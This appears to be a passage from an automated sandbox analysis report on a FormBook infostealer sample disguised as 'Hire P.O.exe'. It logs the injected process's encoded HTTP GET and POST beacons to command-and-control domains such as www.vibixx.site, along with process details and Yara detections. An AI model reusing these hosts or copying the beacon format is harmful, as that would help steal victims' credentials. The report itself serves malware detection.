                                                          Data Ascii: Ht=xbYOED3XuvIwfZQZZlHohBZbJYk4adsN34JEgDZ+/FGydL5jrp5gGrFpz/SlUbhlPI3zhhvIVGEmsmNC0Nx35a+ttGHWWvziScYnNDssnC47sjRZLhpDoTwagwzXCVkJIrSu60aWtHB9HElkum4L5ufazruzw1T5gvMdr5EEW1KT4zdwNKI7t0eONmX9QNI/M2L2Za7dV1Lbhm1faKEsOAUz1p09eAkKWaI4CrOKKzPyCinqQJOvO4AbgbkvirZYc3OYn3JzMaycWsXFOqmsymmTEhGGhCbxenSwVHo7P3UiULpJsj0bIF75soFevzhqoAkWWA58kM36yUHuLBc/vQ6SAMr6yhAoiEVC2w9xQAAfFimC5DN2MytK+XqyUXJdzPhcul7KX5N9wWSVsZPSLUDQ+j7/8bNDjNd+m9Gi6l6/7P0vjXC0qgpt3VTtvgIJRTmJT/A8cLL5laEB3RO+5JW64CRLwGcI437rqq11zN3kFDA5pfGL3Xr/XhnQQ8Is/85dc9/+vXgOECGmXuQ/nsUwFTPIKs8qOuAG6FpI6tOqH5NBn9wDVcekI7XnocqTZMAXCondqRRPAXSutMvugskEpXsJw1MFjtwhino082HoheRNz1ja4Z1S6JGKqW6Ka862jWx7ODQbu3s/VEep+y8narnqNCTF5Pud8WbZf2/X7xeYd1hpJEEa3p948gWel+d3W9WsHTdEWckxJrESVRRGBgw7pYk7pDB9MdioS0guU3jAiLOorhGtD8Xh6GeLqPOQQYAhFvj1TwQjBxlByZIN0+6rNP9q9ZxTTJv/B3tS1wFdt1DGcB9NV71v+NcK+cPveWSfwKpTnHNuZ3t36qb5hpY1j/FklF59M3l4oZ4Vp2PoX7v1rUEUPjjF79xOQVR87PP/+dghXVwXiuk/PY8yUMWpcDSNTr0bkvm9IdoSQvcRd+RMUbjlD9IHL3140MNwRkBrW0+REXJqRm6omEKllVx7neWJcghOer3tYuYrwJG0y [TRUNCATED]
                                                          Nov 15, 2024 09:33:30.422269106 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.1
                                                          Date: Fri, 15 Nov 2024 08:33:30 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Content-Encoding: gzip
                                                          Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.1150005167.172.133.32803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:32.284755945 CET326OUTGET /jlqg/?Ht=8ZwuH3XLrsgkZOwseHvalCxaOoZWL8Myt6ETjGRYvhbDeONq4p5sIs5njeSldqxqKZPhhBSXVHEE53Bztq1snIy3rHn2YPrXd4E8Hi4h+GYhtHJoWRtIl2c=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.omnibizlux.biz
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:32.941217899 CET303INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.1
                                                          Date: Fri, 15 Nov 2024 08:33:32 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 153
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.1150006162.0.211.143803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:38.051337957 CET585OUTPOST /4xim/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.vibixx.site
                                                          Origin: http://www.vibixx.site
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.vibixx.site/4xim/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 35 59 55 76 49 6d 75 49 42 78 66 66 4e 4b 42 31 65 65 32 36 6d 68 76 61 4c 4b 61 52 79 46 30 4b 45 37 34 45 62 68 67 6b 63 35 2f 7a 66 53 72 50 31 79 39 65 4b 54 52 69 52 6c 34 53 64 56 4e 38 42 63 41 4f 39 56 6f 37 4b 62 4a 34 46 48 45 2b 52 37 54 61 35 38 6a 47 41 49 78 63 4f 54 4a 6c 6e 56 70 45 67 4c 38 67 2b 48 47 45 6f 49 6e 37 45 75 59 6e 67 4b 30 73 45 43 57 41 6e 69 69 46 4d 71 2b 73 61 38 5a 30 33 2f 64 4b 4e 76 55 6b 36 74 57 38 36 2b 61 68 53 6e 61 66 42 36 6e 66 2f 67 54 52 41 2f 44 4a 39 4f 58 36 59 72 47 38 69 4b 34 6f 49 44 50 4b 77 4d 76 70 37 30 33 32 70 41 3d 3d
                                                          Data Ascii: Ht=5YUvImuIBxffNKB1ee26mhvaLKaRyF0KE74Ebhgkc5/zfSrP1y9eKTRiRl4SdVN8BcAO9Vo7KbJ4FHE+R7Ta58jGAIxcOTJlnVpEgL8g+HGEoIn7EuYngK0sECWAniiFMq+sa8Z03/dKNvUk6tW86+ahSnafB6nf/gTRA/DJ9OX6YrG8iK4oIDPKwMvp7032pA==
                                                          Nov 15, 2024 09:33:38.725321054 CET533INHTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:33:38 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.1150007162.0.211.143803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:40.598639965 CET605OUTPOST /4xim/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.vibixx.site
                                                          Origin: http://www.vibixx.site
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.vibixx.site/4xim/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 35 59 55 76 49 6d 75 49 42 78 66 66 66 61 52 31 62 39 4f 36 71 52 76 5a 56 61 61 52 39 6c 30 57 45 37 30 45 62 67 30 30 41 62 62 7a 66 7a 62 50 32 32 4a 65 48 7a 52 69 65 46 34 58 5a 56 4e 69 42 63 38 38 39 52 30 37 4b 66 5a 34 46 47 30 2b 52 49 37 64 2f 73 6a 45 49 6f 78 65 4b 54 4a 6c 6e 56 70 45 67 4c 5a 37 2b 48 4f 45 6f 34 58 37 45 4d 77 6b 74 71 30 74 48 43 57 41 74 43 6a 4f 4d 71 2f 4c 61 39 46 65 33 38 6c 4b 4e 75 6b 6b 36 63 57 2f 77 2b 61 6a 66 48 62 2b 41 36 79 58 30 6e 61 39 41 4d 66 30 2b 64 36 43 51 4e 4c 6d 79 70 78 2f 4c 51 48 49 6b 71 4f 5a 79 46 53 2f 79 4c 43 45 69 4a 46 57 5a 4b 52 38 50 51 5a 56 65 62 62 44 77 7a 49 3d
                                                          Data Ascii: Ht=5YUvImuIBxfffaR1b9O6qRvZVaaR9l0WE70Ebg00AbbzfzbP22JeHzRieF4XZVNiBc889R07KfZ4FG0+RI7d/sjEIoxeKTJlnVpEgLZ7+HOEo4X7EMwktq0tHCWAtCjOMq/La9Fe38lKNukk6cW/w+ajfHb+A6yX0na9AMf0+d6CQNLmypx/LQHIkqOZyFS/yLCEiJFWZKR8PQZVebbDwzI=
                                                          Nov 15, 2024 09:33:41.270337105 CET533INHTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:33:41 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.1150008162.0.211.143803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:43.149660110 CET1618OUTPOST /4xim/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.vibixx.site
                                                          Origin: http://www.vibixx.site
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.vibixx.site/4xim/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 35 59 55 76 49 6d 75 49 42 78 66 66 66 61 52 31 62 39 4f 36 71 52 76 5a 56 61 61 52 39 6c 30 57 45 37 30 45 62 67 30 30 41 62 54 7a 66 41 54 50 30 58 4a 65 47 7a 52 69 58 6c 34 57 5a 56 4d 2b 42 63 6c 33 39 52 34 42 4b 5a 46 34 48 6b 4d 2b 58 35 37 64 78 73 6a 45 45 49 78 66 4f 54 49 78 6e 56 35 41 67 4c 4a 37 2b 48 4f 45 6f 36 50 37 4e 2b 59 6b 2b 61 30 73 45 43 57 55 6e 69 6a 6d 4d 71 33 78 61 39 42 6b 30 4e 46 4b 4e 4f 30 6b 68 4f 75 2f 38 2b 61 62 59 48 62 63 41 36 75 59 30 6d 79 48 41 50 44 65 2b 65 61 43 54 73 72 37 75 71 5a 6b 5a 67 66 48 37 70 75 6e 75 67 36 46 2b 38 43 48 6d 38 49 6e 41 75 42 74 48 77 73 72 46 61 36 63 73 32 68 75 38 6c 34 5a 34 35 69 77 79 2f 43 37 79 37 37 46 33 47 7a 59 33 2b 30 30 50 4f 6c 4b 6c 56 63 59 49 41 58 6d 4f 31 78 6c 59 38 50 6e 4d 68 71 47 54 75 6a 41 54 73 38 2b 74 49 67 49 56 6b 53 77 73 46 52 38 6b 70 78 35 31 7a 64 50 74 38 6e 52 75 4e 6d 49 73 4b 46 4e 49 6d 2b 6f 6d 50 71 4a 42 49 64 2b 6b 51 66 6f 31 64 61 42 61 36 65 7a 56 6e 41 41 70 4d 70 [TRUNCATED]
                                                          Data Ascii: Ht=5YUvImuIBxfffaR1b9O6qRvZVaaR9l0WE70Ebg00AbTzfATP0XJeGzRiXl4WZVM+Bcl39R4BKZF4HkM+X57dxsjEEIxfOTIxnV5AgLJ7+HOEo6P7N+Yk+a0sECWUnijmMq3xa9Bk0NFKNO0khOu/8+abYHbcA6uY0myHAPDe+eaCTsr7uqZkZgfH7punug6F+8CHm8InAuBtHwsrFa6cs2hu8l4Z45iwy/C7y77F3GzY3+00POlKlVcYIAXmO1xlY8PnMhqGTujATs8+tIgIVkSwsFR8kpx51zdPt8nRuNmIsKFNIm+omPqJBId+kQfo1daBa6ezVnAApMpFqQCcFR/U5l4N2185S+CMPwjQQyKuvqK8UEQAw9p2CfQ4v1tyj1BSMq/bQCDvkSdYYbPuFWdDiKhpVUiRD8Oq1+xGFYgoJVD9o3mYbHKREf48/RYySHa+XWTXcTDDCn2F7MJXk9kheYorkJ6SS4n0wjAyLxKr3aMapvSFlP/dTaOx7Y4+UOgb02Lg3XikJ4bdX8oYoUNjmz4BRbZRj5HKj2nNlCOK1obk9lU0DXxcFC50SszNgt6FXNXW8Zg4T5+oBYdYdbCJDeD+9Gf5hJ8rylVGQyJDcw2QH7tVjCpIWOkpfF4IlFLSXwZUSaBGK5bkTwriDQ5hX5lCNoif0VMm2loJ7ON0gefShiXsDCQTx3RbTwLijOPUUnI9Ky3G0zMemkhu22S+l4qwjRBKntnnOQgV29J6GXNl5pu950nNJ7AQDtcosCdlKI4qfcsyR2Z++dffaDDGMe9ayij1+rKdmznYeMtDZlfwF+uwUALTz1niME4b5og2xTiGpZ45IeKLxBjTXf+HYTVhJWXNXynlsWwu2nBP7V724bgyED/2KigCNjvGBTIAoBwCFkhpeevFfb+yNxtPfw4qYnTs3v4X2vUbEPmGMtAPnFWzZhVe9jQi7MfUz2QLqj0LeFF2UxpAMlCVmIQU0XIaJFQDStpXIxWAuJKuB0r3J [TRUNCATED]
                                                          Nov 15, 2024 09:33:43.809772015 CET533INHTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:33:43 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.1150009162.0.211.143803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:45.690406084 CET323OUTGET /4xim/?Ht=0a8PLTuVJQjPSrlSWcuFsyjhCtT3tUYocqBNWW0rXtqiQhjiqFhrPTN8PV80cHIUHvAO/w81MYBbJGISUqP2+eiOObBwEQMzrW97hoYkmxyo0/quMuclnrI=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.vibixx.site
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:46.350785017 CET548INHTTP/1.1 404 Not Found
                                                          Date: Fri, 15 Nov 2024 08:33:46 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:1
                                                          Start time:03:30:41
                                                          Start date:15/11/2024
                                                          Path:C:\Users\user\Desktop\Hire P.O.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Hire P.O.exe"
                                                          Imagebase:0x500000
                                                          File size:807'936 bytes
                                                          MD5 hash:838E3079ECEA7CBF8D6909ABE0D6F393
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:03:31:05
                                                          Start date:15/11/2024
                                                          Path:C:\Users\user\Desktop\Hire P.O.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Hire P.O.exe"
                                                          Imagebase:0x540000
                                                          File size:807'936 bytes
                                                          MD5 hash:838E3079ECEA7CBF8D6909ABE0D6F393
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1865405800.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:03:31:31
                                                          Start date:15/11/2024
                                                          Path:C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe"
                                                          Imagebase:0x2c0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:7
                                                          Start time:03:31:33
                                                          Start date:15/11/2024
                                                          Path:C:\Windows\SysWOW64\fc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                          Imagebase:0x7ff68cce0000
                                                          File size:22'528 bytes
                                                          MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:10
                                                          Start time:03:31:47
                                                          Start date:15/11/2024
                                                          Path:C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe"
                                                          Imagebase:0x2c0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:12
                                                          Start time:03:32:04
                                                          Start date:15/11/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff6de060000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:12.5%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:1.2%
                                                            Total number of Nodes:254
                                                            Total number of Limit Nodes:13
